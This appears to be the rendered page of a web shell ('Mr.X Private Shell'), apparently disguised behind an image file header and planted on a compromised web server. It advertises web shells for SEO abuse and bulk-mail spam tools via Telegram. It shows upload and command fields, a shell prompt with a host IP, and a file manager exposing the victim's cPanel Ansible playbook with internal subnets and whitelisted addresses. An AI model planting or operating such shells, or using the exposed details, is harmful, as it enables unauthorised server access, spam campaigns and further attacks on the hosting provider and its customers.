����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
---
- name: Start mysql
  service: name=mysql state=started
- name: Create mysql.sock for cpanel
  file:
    src: /var/lib/mysql/mysql.sock
    dest: /tmp/mysql.sock
    state: link
- name: Set hostname
  shell: "/usr/local/cpanel/bin/set_hostname {{ hostname }}"
- name: Create accesshash
  environment:
    REMOTE_USER: root
  command: /usr/local/cpanel/bin/mkaccesshash
- name: Prepare hash to be sent to keyserv
  shell: cat /root/.accesshash
  register: hash
- name: Validate cpanel license
  command: /usr/local/cpanel/cpkeyclt
- name: Set correct wwwacct.conf
  template:
    src: templates/wwwacct.j2
    dest: /etc/wwwacct.conf
- name: configure /etc/hosts
  template:
    src: templates/hosts.j2
    dest: /etc/hosts
- name: configure getaddrinfo
  template:
    src: templates/gai.conf.j2
    dest: /etc/gai.conf
- name: install brand repo
  yum: name=UL_{{ brand }}_repo state=latest
- name: install cpanel_addon_WPC
  shell: 'yum clean all; yum --disablerepo=ul --disableexcludes=all -y install cpanel_addon_WPC'
- name: install brand extras
  yum: name=cpanel_{{ brand }}_extras disablerepo=ul state=latest
- name: install brand theme
  yum: name=cpanel_{{ brand }}_theme
  when: brand != 'bluehost_in'
- name: whitelist hal
  command: /scripts/cphulkdwhitelist {{ item }}
  with_items:
    - 10.2.0.0/24
    - 10.102.120.0/24
    - 69.195.127.5

Filemanager

Name Type Size Permission Actions
cpanel.yaml File 1.33 KB 0664